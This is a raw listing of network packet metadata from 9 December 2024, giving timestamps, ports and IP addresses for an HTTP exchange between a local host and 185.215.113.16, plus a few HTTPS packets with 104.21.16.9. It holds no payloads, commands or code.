Dec 9, 2024 08:08:42.600687027 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.601453066 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.601532936 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.601574898 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.602344990 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.602448940 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.602545977 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.602583885 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.603236914 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.603276014 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.603431940 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.604085922 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.604151011 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.604188919 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.604228020 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.604264975 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.604980946 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.605026960 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.605132103 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.605225086 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.606081963 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.606127024 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.606236935 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.606739998 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.606782913 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.606933117 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.607163906 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.607628107 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.607678890 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.607742071 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.608083010 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.608524084 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.608639002 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.608684063 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.609424114 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.609467030 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.609532118 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.609570026 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.610306025 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.610415936 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.610459089 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.611207962 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.611249924 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.611320019 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.611876965 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.612103939 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.612256050 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.612267971 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.612292051 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.612982035 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.613090038 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.613133907 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.613866091 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.613914013 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.613950014 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.613991022 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.614758968 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.614798069 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.614865065 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.615257025 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.615688086 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.615781069 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.615786076 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.615818024 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.616539955 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.616580009 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.616620064 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.616682053 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.617408037 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.617455006 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.617528915 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.618125916 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.618268967 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.618311882 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.618418932 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.618459940 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.619180918 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.619225979 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.619340897 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.619379997 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.620048046 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.620091915 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.620161057 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.620198011 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.620982885 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.621108055 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.621154070 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:42.691488028 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.691550016 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:42.694875956 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:43.071214914 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:43.075719118 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:43.259628057 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:43.259721994 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:43.375184059 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:43.379961014 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:43.462361097 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:43.464586020 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:43.558381081 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:43.565303087 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:43.654623985 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:43.658767939 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:43.701407909 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:43.701498985 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:43.882091045 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:43.882106066 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:43.885710001 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:43.926894903 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:43.931538105 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:43.971746922 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:43.975581884 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.016952038 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.017787933 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.062091112 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.062930107 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.107280970 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.111829996 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.152466059 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.152481079 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.152523994 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.188908100 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.189789057 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.225370884 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.228092909 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.261799097 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.263374090 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.298264980 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.299081087 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.334722996 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.336127043 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.371136904 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.373647928 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.407618046 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.416706085 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.442801952 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.444504023 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.476613045 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.476625919 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.509032965 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.520862103 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.520910025 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.540914059 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.553759098 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.571841955 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.576965094 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.601349115 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.614998102 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.631426096 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.640048027 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.660419941 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.674724102 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.689685106 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.704808950 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.720278978 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.734699965 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.746535063 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.746568918 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.749793053 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.774943113 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.779887915 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.802356958 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.812730074 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.828474045 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.836325884 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.854621887 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.858711958 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.880718946 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.887850046 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.906838894 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.919178009 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.932369947 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.933717966 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.956129074 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.964735985 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:44.979604006 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.979615927 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:44.979712963 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.003093958 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.003566980 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.025913000 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.026015043 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.048337936 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.049359083 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.070770025 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.070909023 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.092864990 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.095741987 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.114736080 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.117456913 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.137041092 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.137084007 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.137357950 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.137406111 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.150942087 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.150985956 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.172913074 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.174803972 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.192543030 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.195916891 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.213026047 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.215734005 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.232881069 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.235141993 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.251123905 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.256026983 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.270302057 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.271096945 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.289112091 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.289163113 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.307674885 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.307687998 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.310930014 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.325875044 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.326694012 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.343355894 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.343403101 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.360805035 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.360848904 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.378000975 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.378046989 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.394824028 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.394840956 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.395430088 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.411389112 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.421715021 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.427999973 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.428066015 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.443948984 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.444938898 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.459638119 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.468873978 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.475287914 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.478243113 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.490890026 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.493288994 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.506551981 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.507741928 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.521872997 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.521994114 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.537022114 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.537033081 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.537201881 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.551867962 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.555383921 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.566524982 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.567224979 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.581152916 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.581526041 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.595366955 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.608824015 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.609344006 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.623404980 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.623799086 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.637428045 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.639334917 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.650985003 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.651036978 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.664442062 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.664448023 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.664505005 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.677701950 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.677747011 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.690781116 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.690830946 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.703680038 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.703733921 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.716464043 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.716521978 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.729104042 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.729178905 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.741713047 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.741807938 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.753921986 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.753971100 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.766311884 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.766366005 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.778754950 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.778767109 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.778810978 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.790791988 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.790844917 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.802683115 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.802747965 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.814462900 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.815865993 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.826049089 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.826157093 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.833301067 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.833343983 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.844695091 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.844747066 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.856004953 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.856057882 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.867130041 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.867141008 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.867186069 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.878170967 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.886116028 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.889034033 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.889091015 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.899864912 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.901072979 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.910510063 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.910630941 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.921161890 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.923507929 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.931627989 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.931688070 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.941951036 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.942001104 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.952299118 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.954684973 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.962518930 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.962532043 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.962979078 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:45.972969055 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:45.973067999 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:45.974706888 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:45.975116968 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:45.975142002 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:45.992434025 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:45.995239019 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:46.002078056 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:46.002089977 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:46.002126932 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:46.021128893 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:46.021141052 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:46.021152020 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:46.021173954 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:46.021205902 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:46.040098906 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:46.040111065 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:46.040149927 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:46.058835983 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:46.058861017 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:46.058883905 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:46.058906078 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:46.077153921 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:46.077197075 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:46.077202082 CET	49854	80	192.168.2.4	185.215.113.16
